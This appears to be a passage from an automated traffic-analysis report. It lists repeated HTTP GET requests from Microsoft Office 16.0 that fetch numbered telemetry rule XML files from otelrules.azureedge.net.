              Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
